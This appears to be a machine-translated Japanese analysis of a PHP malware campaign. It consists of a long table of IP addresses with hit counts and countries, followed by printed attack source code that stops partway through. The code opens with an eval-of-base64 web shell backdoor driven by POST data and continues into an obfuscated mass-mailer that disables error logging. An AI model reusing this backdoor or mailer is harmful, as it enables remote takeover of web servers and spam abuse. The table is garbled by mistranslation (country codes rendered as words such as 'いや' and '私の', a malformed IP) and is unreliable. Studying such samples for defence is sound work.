201.49.58.240	396	BR	ブラジル	フォルタレザ
78.140.173.31	396	Nl	オランダ
46.4.29.81	396	DE	ドイツ
50.87.45.80	396	米国	米国	プロボ
213.81.223.204	396	SK	スロバキア
210.211.117.203	396	Vn	ベトナム	ハノイ
212.178.98.97	396	Nl	オランダ	セルトーヘンボス
151.236.44.203	396	GB	イギリス
178.77.80.158	384	DE	ドイツ	一番
109.73.173.176	384	で	インド	ニューデリー
88.80.210.136	384	DE	ドイツ	一番
77.222.40.96	384	RU	ロシア連邦
89.20.37.147	384	RU	ロシア連邦
188.138.103.170	384	DE	ドイツ
192.196.158.93	384	米国	米国	ウエストチェスター
68.115.58.114	384	米国	米国	オナラスカ
185.17.240.3	384	FR	フランス
67.222.143.120	372	米国	米国	ダラス
81.169.177.66	372	DE	ドイツ	ベルリン
199.189.111.180	372	米国	米国	プロビデンス
88.208.204.131	372	GB	イギリス	グロスター
77.222.40.66	372	RU	ロシア連邦
91.201.52.62	372	RU	ロシア連邦
78.56.78.115	372	LT	リトアニア	ビリニュス
199.36.142.138	372	米国	米国	プラノ
91.207.158.161	372	いや	ノルウェー
94.127.69.239	372	RU	ロシア連邦
93.57.93.125	372	IT	イタリア	レッジョ・ネッレミリア
176.28.15.41	372	DE	ドイツ	一番
192.190.84.106	372	米国	米国	ウエストチェスター
176.9.37.82	372	DE	ドイツ
198.20.177.190	360	米国	米国	バッファロー
91.225.136.223	360	UA	ウクライナ
77.222.56.165	360	RU	ロシア連邦
162.219.6.215	360	米国	米国	オレム
185.4.74.145	360	ええ	エストニア
77.222.56.211	360	RU	ロシア連邦
77.221.136.250	360	RU	ロシア連邦
109.69.8.41	360	ES	スペイン	バルセロナ
108.160.148.150	360	米国	米国	ピスカタウェイ
5.79.24.70	360	GB	イギリス
41.76.118.147	360	ザ	南アフリカ
94.76.244.229	360	GB	イギリス
67.20.55.144	360	米国	米国	ノビ
216.120.237.240	360	米国	米国	クリフトンパーク
185.19.184.132	360	IT	イタリア
88.198.62.50	360	DE	ドイツ	ネルンベルク
213.161.179.4	360	いや	ノルウェー
173.203.70.239	360	米国	米国	サンアントニオ
77.120.108.132	360	UA	ウクライナ	キエフ
198.61.217.176	360	米国	米国	サンアントニオ
62.140.253.3	360	RU	ロシア連邦
77.221.130.53	360	RU	ロシア連邦
64.111.126.33	360	米国	米国	ブレア
112.213.88.159	348	Vn	ベトナム	グエン
77.222.61.240	348	RU	ロシア連邦
77.222.56.10	348	RU	ロシア連邦
27.111.40.218	348	ID	インドネシア
199.189.248.130	348	米国	米国	ニューヨーク
217.78.0.123	348	IE	アイルランド
54.200.212.241	348	米国	米国	取締役
93.186.241.17	348	IT	イタリア
192.145.239.10	348	米国	米国	ロサンゼルス
85.214.84.237	348	DE	ドイツ	ベルリン
77.222.61.167	348	RU	ロシア連邦
86.107.43.52	348	RO	ルーマニア
99.198.99.58	348	米国	米国	シカゴ
195.88.7.11	348	IT	イタリア	ケース
178.21.73.112	348	SE	スウェーデン
77.222.40.125	348	RU	ロシア連邦
70.32.74.121	348	米国	米国	カルバーシティ
82.165.156.128	348	DE	ドイツ
168.63.66.108	348	米国	米国
188.225.35.191	348	RU	ロシア連邦
162.144.91.135	336	米国	米国	プロボ
85.13.139.30	336	DE	ドイツ
222.122.197.61	336	KR	韓国、共和国
87.106.138.48	336	DE	ドイツ
77.221.130.11	336	RU	ロシア連邦
198.46.81.6	336	米国	米国	ロサンゼルス
46.165.242.3	336	DE	ドイツ
65.254.62.103	336	米国	米国	アトランタ
188.130.241.26	336	RU	ロシア連邦	プスコフ
5.79.65.210	336	Nl	オランダ	アムステルダム
49.50.8.42	336	ID	インドネシア
50.57.171.172	336	米国	米国	サンアントニオ
216.194.164.114	336	米国	米国	ロサンゼルス
198.211.120.91	336	米国	米国	ニューヨーク
67.222.24.198	336	米国	米国	ダラス
130.185.81.10	336	PT	ポルトガル
64.119.182.22	336	米国	米国	イングルウッド
89.184.76.137	336	UA	ウクライナ	キエフ
27.254.81.20	336	Th	タイ
85.214.234.201	336	DE	ドイツ	ベルリン
208.111.166.38	336	米国	米国	テンペ
77.89.7.180	336	IT	イタリア	ファエンツァ
88.190.35.53	336	FR	フランス	パリ
69.64.88.232	336	米国	米国	オーバーランドパーク
141.8.195.92	336	RU	ロシア連邦
74.220.207.177	336	米国	米国	プロボ
82.94.235.102	336	Nl	オランダ
96.30.11.224	336	米国	米国	シカゴ
54.85.40.172	336	米国	米国	アッシュバーン
62.244.56.5	324	UA	ウクライナ
91.201.52.114	324	RU	ロシア連邦
5.9.144.163	324	DE	ドイツ
81.19.186.130	324	GB	イギリス
69.175.44.34	324	米国	米国	シカゴ
77.222.61.13	324	RU	ロシア連邦
88.198.224.107	324	DE	ドイツ
162.144.81.227	324	米国	米国	プロボ
193.17.184.48	324	PL	ポーランド
198.101.226.193	324	米国	米国	サンアントニオ
5.9.13.108	324	DE	ドイツ
107.21.249.76	324	米国	米国	アッシュバーン
50.112.253.249	324	米国	米国	取締役
75.126.65.39	324	米国	米国	ダラス
95.215.226.222	324	GB	イギリス
216.245.201.84	324	米国	米国	ダラス
46.16.169.5	324	IT	イタリア
195.13.228.124	324	LV	ラトビア	リガ
81.176.226.170	324	RU	ロシア連邦
198.1.126.90	324	米国	米国	プロボ
187.53.223.108	324	BR	ブラジル
75.147.255.122	324	米国	米国	ミルフォード
142.54.185.202	324	米国	米国	カンザスシティ
54.235.53.185	324	米国	米国	アッシュバーン
91.196.170.203	324	Nl	オランダ
216.55.181.132	324	米国	米国	オーバーランドパーク
77.221.130.21	324	RU	ロシア連邦
88.198.36.103	324	DE	ドイツ	ネルンベルク
178.79.170.193	312	GB	イギリス
208.76.86.35	312	米国	米国	トロイ
188.92.240.34	312	RU	ロシア連邦
198.154.111.122	312	米国	米国	ダラス
198.27.81.115	312	CA	カナダ	モントラル
64.251.188.69	312	米国	米国	壁
222.97.189.45	312	KR	韓国、共和国
200.251.53.139	312	BR	ブラジル
188.127.239.136	312	RU	ロシア連邦
77.222.40.115	312	RU	ロシア連邦
176.28.55.122	312	DE	ドイツ	一番
80.91.89.227	312	ES	スペイン
208.113.129.14	312	米国	米国	ブレア
119.59.105.157	312	Th	タイ
213.136.65.234	312	DE	ドイツ
91.228.236.4	312	UA	ウクライナ
144.76.112.179	312	DE	ドイツ
106.186.112.193	312	JP	日本
74.220.219.68	312	米国	米国	プロボ
89.184.67.225	312	UA	ウクライナ	キエフ
67.205.47.214	312	米国	米国	ブレア
166.78.144.154	312	米国	米国	サンアントニオ
162.253.145.150	312	米国	米国
212.97.160.75	312	ES	スペイン	サラゴサ
77.120.105.130	312	UA	ウクライナ
103.23.79.134	312	SG	シンガポール
77.222.40.81	312	RU	ロシア連邦
74.50.87.130	312	米国	米国	ユニオンシティ
107.21.114.99	312	米国	米国	アッシュバーン
148.251.41.70	312	DE	ドイツ
86.107.43.53	312	RO	ルーマニア
218.213.244.117	312	Hk	香港	クワイ・チョン
82.98.162.44	312	ES	スペイン
90.150.149.3	312	RU	ロシア連邦
62.77.65.123	312	Cz	チェコ共和国
222.124.202.178	312	ID	インドネシア	ジャカルタ
91.201.52.87	312	RU	ロシア連邦
77.222.40.53	312	RU	ロシア連邦
194.186.22.174	300	RU	ロシア連邦
83.169.19.196	300	DE	ドイツ	一番
87.247.179.190	300	IR	イラン、イスラム共和国
157.7.184.16	300	JP	日本
62.75.216.86	300	DE	ドイツ
64.111.127.191	300	米国	米国	ブレア
54.199.128.26	300	JP	日本	東京
212.83.148.67	300	FR	フランス
109.72.95.12	300	Nl	オランダ
54.236.216.241	300	米国	米国	アッシュバーン
46.4.61.212	300	DE	ドイツ
118.69.204.202	300	Vn	ベトナム
92.255.196.173	300	RU	ロシア連邦	カザン
23.89.192.224	300	米国	米国	ヘンダーソン
27.254.66.151	300	Th	タイ
85.13.150.116	300	DE	ドイツ
81.201.49.9	300	Cz	チェコ共和国	クラドノ
173.254.28.57	300	米国	米国	プロボ
144.76.154.81	300	DE	ドイツ
66.115.174.137	300	米国	米国	マリエッタ
212.15.115.19	300	RU	ロシア連邦	モスクワ
89.184.70.31	300	UA	ウクライナ	キエフ
85.25.201.176	300	DE	ドイツ
120.138.21.77	300	Nz	ニュージーランド
98.142.240.110	300	CA	カナダ	ブランプトン
184.107.154.82	300	CA	カナダ	モントラル
159.253.144.76	300	Nl	オランダ
109.202.13.114	288	RU	ロシア連邦	トムスク
178.172.148.221	288	BY	ベラルーシ
164.177.151.209	288	GB	イギリス
198.154.248.248	288	米国	米国	ヒューストン
75.125.253.18	288	米国	米国	ヒューストン
190.153.188.6	288	CL	チリ	サンティアゴ
78.47.94.128	288	DE	ドイツ
54.250.184.233	288	JP	日本	東京
183.81.164.218	288	私の	マレーシア
176.9.218.111	288	DE	ドイツ
194.27.32.44	288	TR	トルコ	ムーラ
185.4.75.69	288	ええ	エストニア
91.212.157.65	288	FR	フランス
217.20.175.14	288	UA	ウクライナ
64.90.57.231	288	米国	米国	ブレア
148.251.0.23	288	DE	ドイツ
50.56.69.73	288	米国	米国	サンアントニオ
188.165.229.9	288	FR	フランス
46.252.16.11	288	DE	ドイツ
178.63.68.203	288	DE	ドイツ
82.98.139.8	288	ES	スペイン
212.67.217.28	288	GB	イギリス
87.118.90.207	288	DE	ドイツ
91.239.66.97	288	PL	ポーランド
78.46.220.108	288	DE	ドイツ
85.13.138.19	288	DE	ドイツ
195.62.70.239	288	RU	ロシア連邦
95.163.69.102	288	RU	ロシア連邦
129.121.177.180	288	米国	米国	アルバカーキ
69.28.254.181	288	CA	カナダ	モントラル
208.113.225.11	288	米国	米国	ブレア
202.181.172.147	288	Hk	香港
103.1.186.252	288	Au	オーストラリア	マリックビル
81.176.232.174	287	RU	ロシア連邦
80.247.79.182	276	IT	イタリア
83.216.181.139	276	IT	イタリア	フィオラノモデネーゼ
212.191.32.222	276	PL	ポーランド	ウッチ
194.190.67.126	276	RU	ロシア連邦
77.222.40.205	276	RU	ロシア連邦
77.222.56.208	276	RU	ロシア連邦
198.154.218.101	276	米国	米国	ヒューストン
23.253.211.174	276	米国	米国	サンアントニオ
198.15.95.74	276	米国	米国	テンペ
82.98.169.87	276	ES	スペイン
199.89.53.36	276	米国	米国
89.184.69.2	276	UA	ウクライナ	キエフ
133.242.205.125	276	JP	日本	さくら
213.238.166.30	276	TR	トルコ
5.187.1.232	276	DE	ドイツ	フランクフルト
108.171.175.23	276	米国	米国	サンアントニオ
203.176.183.45	276	ID	インドネシア	ボゴール
212.224.118.220	276	DE	ドイツ
176.67.240.92	276	RU	ロシア連邦	ニジニ・ノヴゴロド
65.99.237.20	276	米国	米国	セントルイス
178.63.22.196	276	DE	ドイツ
77.222.61.185	276	RU	ロシア連邦
95.213.136.66	276	RU	ロシア連邦
49.50.8.226	276	ID	インドネシア
64.90.42.228	276	米国	米国	ブレア
195.204.17.84	276	いや	ノルウェー	s
162.213.254.82	276	米国	米国	ロサンゼルス
62.75.142.113	276	DE	ドイツ
173.203.81.168	276	米国	米国	サンアントニオ
106.187.93.112	276	JP	日本
195.225.168.238	276	IT	イタリア
173.214.187.101	276	米国	米国	エドモンド
70.32.78.142	276	米国	米国	カルバーシティ
46.119.10.42	276	UA	ウクライナ
129.121.176.183	264	米国	米国	アルバカーキ
74.220.207.175	264	米国	米国	プロボ
184.107.198.106	264	CA	カナダ	モントラル
106.51.252.22	264	で	インド
117.53.153.171	264	私の	マレーシア
108.168.130.34	264	米国	米国	ダラス
77.222.40.26	264	RU	ロシア連邦
77.221.130.46	264	RU	ロシア連邦
87.106.18.135	264	DE	ドイツ
88.80.213.62	264	DE	ドイツ	一番
68.171.222.84	264	米国	米国	サウスフィールド
81.176.226.164	264	RU	ロシア連邦
65.99.237.17	264	米国	米国	セントルイス
69.195.198.156	264	米国	米国	マイアミ
216.194.8.46	264	米国	米国	ハリソン
67.205.20.94	264	米国	米国	ブレア
77.232.72.80	264	EU	ヨーロッパ
208.113.229.16	264	米国	米国	ブレア
193.239.4.84	264	DE	ドイツ
174.140.212.122	264	米国	米国	ラスベガス
77.222.61.113	264	RU	ロシア連邦
77.92.143.166	264	TR	トルコ	サナイ
91.199.197.222	264	RU	ロシア連邦
89.31.103.105	264	Nl	オランダ
77.120.106.25	264	UA	ウクライナ
5.178.85.12	264	RU	ロシア連邦
83.169.19.228	264	DE	ドイツ	一番
199.116.78.158	264	米国	米国	トラバースシティ
91.218.230.119	252	RU	ロシア連邦
50.57.86.110	252	米国	米国	サンアントニオ
212.72.171.211	252	DE	ドイツ
92.61.157.40	252	EU	ヨーロッパ
37.59.3.134	252	FR	フランス
88.198.40.196	252	DE	ドイツ	ネルンベルク
74.50.2.123	252	米国	米国	アナハイム
163.178.101.196	252	CR	コスタリカ	サンジョス
77.222.40.65	252	RU	ロシア連邦
184.173.107.12	252	米国	米国	ヒューストン
81.169.131.15	252	DE	ドイツ	ベルリン
69.175.78.58	252	米国	米国	シカゴ
77.222.40.221	252	RU	ロシア連邦
148.251.55.181	252	DE	ドイツ
62.75.230.62	252	DE	ドイツ
5.250.177.86	252	GB	イギリス
77.221.130.38	252	RU	ロシア連邦
142.4.29.17	252	米国	米国	プロボ
199.116.78.108	252	米国	米国	トラバースシティ
178.208.131.106	252	RU	ロシア連邦
95.169.186.78	252	DE	ドイツ
77.222.57.40	240	RU	ロシア連邦
8.29.131.195	240	米国	米国	シンシナティ
95.168.210.61	240	Cz	チェコ共和国
188.165.250.82	240	FR	フランス
188.120.241.11	240	RU	ロシア連邦	モスクワ
5.9.122.105	240	DE	ドイツ
192.237.186.143	240	米国	米国	サンアントニオ
46.183.250.13	240	Nl	オランダ
77.222.40.44	240	RU	ロシア連邦
77.221.130.31	240	RU	ロシア連邦
5.9.147.234	240	DE	ドイツ
82.146.37.81	240	RU	ロシア連邦	イルクーツク
95.138.189.116	240	GB	イギリス
89.184.72.80	240	UA	ウクライナ	キエフ
173.0.129.96	240	米国	米国	オーランド
98.129.239.249	228	米国	米国	サンアントニオ
174.136.12.69	228	米国	米国	ダラム
85.214.149.196	228	DE	ドイツ	ベルリン
88.208.250.12	228	GB	イギリス	グロスター
5.9.150.76	228	DE	ドイツ
200.124.138.52	228	Cw	クルカオ	ウィレムスタッド
82.98.144.22	228	ES	スペイン
192.99.16.165	228	CA	カナダ	モントラル
88.204.108.93	228	RU	ロシア連邦	トムスク
62.99.220.220	228	AT	オーストリア
203.123.187.186	228	で	インド
91.201.52.83	228	RU	ロシア連邦
153.122.9.192	228	JP	日本	東京
77.87.193.193	228	UA	ウクライナ
199.231.93.131	228	米国	米国	ナニュエット
212.102.229.234	228	DE	ドイツ	オーバーベルク
193.106.95.104	228	RU	ロシア連邦	モスクワ
92.61.152.95	228	EU	ヨーロッパ
178.218.166.171	228	人事	クロアチア
217.243.238.50	228	DE	ドイツ
188.225.36.197	228	RU	ロシア連邦
83.169.31.225	228	DE	ドイツ	一番
144.76.200.117	228	DE	ドイツ
176.58.122.8	216	GB	イギリス
195.149.225.171	216	PL	ポーランド
31.31.196.47	216	RU	ロシア連邦
79.96.190.30	216	PL	ポーランド
208.113.153.234	216	米国	米国	ブレア
5.79.29.126	216	GB	イギリス
103.11.74.136	216	ID	インドネシア
198.100.45.29	216	米国	米国
9/9 / 169.12	204	SK	スロバキア
82.207.52.82	204	UA	ウクライナ
5.63.159.22	204	RU	ロシア連邦
46.28.64.150	204	UA	ウクライナ
199.116.78.161	204	米国	米国	トラバースシティ
195.210.46.110	204	KZ	カザフスタン
81.19.186.159	204	GB	イギリス
64.55.119.44	204	米国	米国	ランチョコードヴァ
23.252.121.207	204	米国	米国	ロサンゼルス
69.41.236.53	204	米国	米国	ヒューストン
50.23.81.82	204	米国	米国	サンノゼ
46.165.220.147	204	DE	ドイツ
77.221.130.17	204	RU	ロシア連邦
37.59.10.29	192	FR	フランス
193.17.204.52	192	DE	ドイツ
216.120.250.101	192	米国	米国	クリフトンパーク
162.209.99.196	192	米国	米国	サンアントニオ
77.91.205.166	192	PT	ポルトガル
81.25.126.23	192	ES	スペイン
207.58.145.53	192	米国	米国	マクリーン
112.78.2.175	192	Vn	ベトナム
207.228.63.37	192	米国	米国	リノ
195.158.234.59	192	RO	ルーマニア
103.244.9.7	192	SG	シンガポール
85.214.144.114	192	DE	ドイツ	ベルリン
81.29.203.238	192	IT	イタリア
87.106.135.33	192	DE	ドイツ
85.13.143.160	180	DE	ドイツ
162.243.40.27	180	米国	米国
82.98.134.212	180	ES	スペイン
66.225.219.33	180	米国	米国	シカゴ
46.33.115.219	180	Cz	チェコ共和国
66.199.140.243	180	CA	カナダ	トロント
112.78.6.239	180	Vn	ベトナム
213.168.182.122	180	Cz	チェコ共和国	ムラダ・ボレスラフ
91.142.208.62	168	ES	スペイン	バルセロナ
68.171.219.98	168	米国	米国	サウスフィールド
69.163.180.47	168	米国	米国	ブレア
176.9.33.44	168	DE	ドイツ
5.9.107.11	168	DE	ドイツ
95.76.161.151	168	RO	ルーマニア	ブカレスト
81.177.3.76	168	RU	ロシア連邦
77.232.68.46	168	EU	ヨーロッパ
37.140.192.17	168	RU	ロシア連邦
198.154.104.66	168	米国	米国	ダラス
85.13.130.230	168	DE	ドイツ
49.50.8.193	156	ID	インドネシア
5.9.141.74	156	DE	ドイツ
70.85.33.34	156	米国	米国	ヒューストン
46.4.90.51	156	DE	ドイツ
151.78.206.227	156	IT	イタリア
77.222.56.22	156	RU	ロシア連邦
37.140.192.60	144	RU	ロシア連邦
210.211.101.21	144	Vn	ベトナム	ハノイ
88.198.158.190	144	DE	ドイツ
198.57.163.213	144	米国	米国	プロボ
103.249.108.101	144	Hk	香港
77.222.61.197	144	RU	ロシア連邦
85.214.240.160	144	DE	ドイツ	ベルリン
174.136.14.109	132	米国	米国	ダラム
98.129.249.134	132	米国	米国	サンアントニオ
108.168.250.16	132	米国	米国	ダラス
64.34.157.180	132	米国	米国	ニューヨーク
217.160.168.95	132	DE	ドイツ
144.76.131.196	132	DE	ドイツ
213.162.246.73	132	いや	ノルウェー
162.144.36.171	132	米国	米国	プロボ
198.57.205.195	132	米国	米国	プロボ
208.113.185.93	132	米国	米国	ブレア
194.100.28.115	132	FI	フィンランド
79.99.203.89	120	BE	ベルギー
82.98.134.217	120	ES	スペイン
134.0.113.79	120	RU	ロシア連邦
173.236.176.122	120	米国	米国	ブレア
92.53.126.190	120	RU	ロシア連邦
85.13.130.227	120	DE	ドイツ
77.221.130.37	120	RU	ロシア連邦
64.202.107.85	120	米国	米国	シカゴ
212.34.156.23	120	ES	スペイン
184.173.107.20	108	米国	米国	ヒューストン
46.161.1.139	108	RU	ロシア連邦	サンクトペテルブルク
64.5.33.166	108	米国	米国	ヒューストン
212.85.116.109	108	PL	ポーランド
5.63.159.66	108	RU	ロシア連邦
89.184.78.99	108	UA	ウクライナ	キエフ
85.25.78.183	108	DE	ドイツ
148.251.47.43	108	DE	ドイツ
92.53.126.118	96	RU	ロシア連邦
92.53.125.178	96	RU	ロシア連邦
92.53.112.202	96	RU	ロシア連邦
92.53.125.158	96	RU	ロシア連邦
75.126.27.90	96	米国	米国	ダラス
77.222.40.185	96	RU	ロシア連邦
195.234.4.60	96	UA	ウクライナ
78.108.80.10	96	RU	ロシア連邦
79.96.54.190	96	PL	ポーランド
77.75.35.140	96	TR	トルコ
85.13.150.66	96	DE	ドイツ
93.93.64.206	84	ES	スペイン
37.140.192.168	84	RU	ロシア連邦
92.53.126.164	84	RU	ロシア連邦
108.168.250.13	72	米国	米国	ダラス
108.168.250.9	72	米国	米国	ダラス
81.177.140.171	72	RU	ロシア連邦
92.53.113.36	72	RU	ロシア連邦
70.33.246.30	72	CA	カナダ	オークビル
188.93.144.86	72	Nl	オランダ
70.33.246.40	72	CA	カナダ	オークビル
81.176.228.2	72	RU	ロシア連邦
77.222.42.176	60	RU	ロシア連邦
92.53.114.59	60	RU	ロシア連邦
199.116.78.5	60	米国	米国	トラバースシティ
216.119.155.246	60	米国	米国	アトランタ
176.57.209.92	60	RU	ロシア連邦
89.161.215.60	60	PL	ポーランド
108.168.219.173	60	米国	米国	ダラス
99.198.109.202	60	米国	米国	シカゴ
92.53.126.193	60	RU	ロシア連邦
2.81.128.216	48	PT	ポルトガル	ゲダ
176.57.210.32	48	RU	ロシア連邦
85.13.139.125	48	DE	ドイツ
92.53.98.156	48	RU	ロシア連邦
85.214.149.38	48	DE	ドイツ	ベルリン
74.124.195.45	48	米国	米国	ロサンゼルス
81.177.139.51	48	RU	ロシア連邦
92.53.112.194	48	RU	ロシア連邦
198.178.116.241	48	CA	カナダ
192.249.114.32	48	米国	米国	ロサンゼルス
92.53.126.72	48	RU	ロシア連邦
92.53.112.21	48	RU	ロシア連邦
173.254.28.61	48	米国	米国	プロボ
92.53.125.30	48	RU	ロシア連邦
81.176.66.244	48	RU	ロシア連邦
65.99.239.227	48	米国	米国	セントルイス
37.140.192.56	48	RU	ロシア連邦
37.140.192.87	48	RU	ロシア連邦
190.107.17.66	36	CO	コロンビア	ペレイラ
92.53.114.245	36	RU	ロシア連邦
37.140.192.71	36	RU	ロシア連邦
37.140.192.226	36	RU	ロシア連邦
81.177.141.101	36	RU	ロシア連邦
37.140.192.126	36	RU	ロシア連邦
37.140.192.32	36	RU	ロシア連邦
81.177.6.6	36	RU	ロシア連邦
205.234.140.231	36	米国	米国	シカゴ
81.177.141.32	36	RU	ロシア連邦
92.53.118.27	36	RU	ロシア連邦
37.140.192.63	36	RU	ロシア連邦
92.53.125.196	36	RU	ロシア連邦
168.144.144.36	36	CA	カナダ	トロント
69.175.71.50	36	米国	米国	シカゴ
79.96.147.100	36	PL	ポーランド
195.210.29.11	36	SK	スロバキア
91.197.230.12	36	GB	イギリス
92.53.113.216	36	RU	ロシア連邦
81.177.139.181	36	RU	ロシア連邦
184.173.107.17	36	米国	米国	ヒューストン
212.113.145.195	36	GB	イギリス
184.173.107.8	36	米国	米国	ヒューストン
31.31.196.35	36	RU	ロシア連邦
92.38.226.14	36	RU	ロシア連邦
92.53.98.191	36	RU	ロシア連邦
92.53.118.140	36	RU	ロシア連邦
207.58.154.27	24	米国	米国	レストン
77.222.61.160	24	RU	ロシア連邦
192.185.82.247	24	米国	米国	ヒューストン
46.4.126.106	24	DE	ドイツ
81.177.141.171	24	RU	ロシア連邦
178.254.9.65	24	DE	ドイツ
92.53.114.3	24	RU	ロシア連邦
217.107.34.91	24	RU	ロシア連邦
37.140.192.128	24	RU	ロシア連邦
176.57.209.180	24	RU	ロシア連邦
92.53.96.161	24	RU	ロシア連邦
31.31.196.39	24	RU	ロシア連邦
176.9.7.149	24	DE	ドイツ
79.170.44.106	24	GB	イギリス
81.177.141.201	24	RU	ロシア連邦
81.177.141.161	24	RU	ロシア連邦
37.140.192.106	24	RU	ロシア連邦
81.177.6.72	24	RU	ロシア連邦
81.177.141.221	24	RU	ロシア連邦
81.177.135.151	24	RU	ロシア連邦
176.57.210.35	24	RU	ロシア連邦
176.57.216.2	24	RU	ロシア連邦
184.154.233.2	24	米国	米国	シカゴ
37.140.192.36	24	RU	ロシア連邦
76.74.242.200	24	米国	米国	ニューヨーク
91.197.228.150	24	GB	イギリス
92.53.121.56	24	RU	ロシア連邦
81.177.140.71	24	RU	ロシア連邦
184.173.107.4	24	米国	米国	ヒューストン
176.57.216.90	24	RU	ロシア連邦
198.57.247.202	24	米国	米国	プロボ
192.185.176.225	24	米国	米国	ヒューストン
176.57.209.69	24	RU	ロシア連邦
37.140.192.110	24	RU	ロシア連邦
50.87.144.47	24	米国	米国	プロボ
92.53.112.82	24	RU	ロシア連邦
92.53.98.158	24	RU	ロシア連邦
81.95.96.178	24	Cz	チェコ共和国	プラハ
69.90.162.100	24	CA	カナダ	オークビル
37.140.192.202	24	RU	ロシア連邦
37.140.192.9	24	RU	ロシア連邦
69.25.136.252	24	米国	米国	アトランタ
37.140.192.80	24	RU	ロシア連邦
92.53.96.220	24	RU	ロシア連邦
185.21.133.101	24	GB	イギリス
92.53.126.22	12	RU	ロシア連邦
72.47.209.127	12	米国	米国	カルバーシティ
81.177.139.21	12	RU	ロシア連邦
92.53.118.117	12	RU	ロシア連邦
192.185.83.110	12	米国	米国	ヒューストン
64.188.46.136	12	米国	米国	シカゴ
92.53.96.49	12	RU	ロシア連邦
67.227.167.68	12	米国	米国	ランシング
92.53.121.68	12	RU	ロシア連邦
50.87.144.189	12	米国	米国	プロボ
50.87.144.38	12	米国	米国	プロボ
91.197.231.175	12	GB	イギリス
81.177.140.11	12	RU	ロシア連邦
92.127.158.27	12	RU	ロシア連邦
79.96.63.38	12	PL	ポーランド
212.85.108.205	12	PL	ポーランド
92.53.96.89	12	RU	ロシア連邦
81.177.140.121	12	RU	ロシア連邦
89.161.164.194	12	PL	ポーランド
192.185.83.227	12	米国	米国	ヒューストン
81.177.139.211	12	RU	ロシア連邦
188.93.212.44	12	RU	ロシア連邦
37.140.192.13	12	RU	ロシア連邦
92.53.96.29	12	RU	ロシア連邦
176.57.209.137	12	RU	ロシア連邦
217.107.34.41	12	RU	ロシア連邦
176.57.209.48	12	RU	ロシア連邦
92.53.125.54	12	RU	ロシア連邦
92.53.125.208	12	RU	ロシア連邦
92.53.96.47	12	RU	ロシア連邦
195.234.4.50	12	UA	ウクライナ
92.53.125.90	12	RU	ロシア連邦
81.177.140.64	12	RU	ロシア連邦
92.53.114.85	12	RU	ロシア連邦
91.106.203.85	12	RU	ロシア連邦
176.57.210.4	12	RU	ロシア連邦
81.177.141.191	12	RU	ロシア連邦
192.185.83.162	12	米国	米国	ヒューストン
81.177.139.111	12	RU	ロシア連邦
81.177.141.211	12	RU	ロシア連邦
91.218.228.154	12	RU	ロシア連邦
70.33.241.140	12	米国	米国	ニューヨーク
192.185.2.221	12	米国	米国	ヒューストン
193.183.99.171	12	IT	イタリア	ミラノ
80.172.241.44	12	PT	ポルトガル
37.140.192.238	12	RU	ロシア連邦
208.38.186.100	12	米国	米国	ネーパービル
198.57.247.182	12	米国	米国	プロボ
81.177.140.221	12	RU	ロシア連邦
92.53.114.123	12	RU	ロシア連邦
213.183.63.3	12	RU	ロシア連邦	モスクワ
85.89.105.30	12	RU	ロシア連邦
81.177.139.11	12	RU	ロシア連邦
192.163.206.142	12	米国	米国	プロボ
192.185.4.59	12	米国	米国	杉林
81.177.135.121	12	RU	ロシア連邦
85.158.183.141	12	DE	ドイツ
92.38.226.13	12	RU	ロシア連邦
92.53.96.240	12	RU	ロシア連邦
217.107.219.191	12	RU	ロシア連邦
173.255.225.130	6	米国	米国	カレッジステーション
IP	ヒット数	国コード	国名	市区町村

国別のドーナツとヒット数

悪意のあるスクリプトのソースコード（PHPコードは作成されますが、変数と関数の名前は変更されません）

<?php eval(base64_decode($_POST['n8743bb']));?> <?php @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); @ini_set('log_errors',0); if(count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $SomeGlobalVar = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $SomeGlobalVar = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($SomeGlobalVar) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); 